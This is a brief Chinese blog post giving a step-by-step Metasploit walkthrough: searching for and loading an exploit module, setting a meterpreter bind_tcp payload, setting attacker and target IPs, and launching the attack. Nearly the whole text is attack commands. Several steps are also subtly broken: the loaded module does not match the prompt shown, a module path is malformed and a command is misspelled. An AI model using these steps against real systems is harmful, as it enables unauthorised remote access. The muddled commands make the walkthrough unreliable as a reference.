1、连接MSF

root@kali:~# msfconsole

2、显示所有攻击模块

msf > show exploits |more

3、寻找攻击模块

msf > search ms08_067

4、使用攻击模块

msf > use /exploits/windows/tftp/tftpd32_long_filename

5、显示payloads

msf > show paylods

6、设置payloads

msf exploit(php_cgi_arg_injection) > set PAYLOAD php/meterpreter/bind_tcp

7、查询设置

msf exploit(php_cgi_arg_injection) > show options

8、监听本地IP

msf exploit(php_cgi_arg_injection) > set LHOST 192.168.1.88

9、监听目标IP

msf exploit(php_cgi_arg_injection) > set RHOST 192.168.1.74

10、开始攻击

msf exploit(php_cgi_arg_injection) > exploit

 

相关文章:

  • 2021-12-28
  • 2021-09-15
  • 2021-08-17
  • 2022-12-23
  • 2021-11-27
  • 2022-01-10
  • 2022-01-30
猜你喜欢
  • 2021-12-31
  • 2021-09-15
  • 2021-11-01
  • 2021-11-02
  • 2022-12-23
  • 2021-12-23
  • 2021-11-18
相关资源
相似解决方案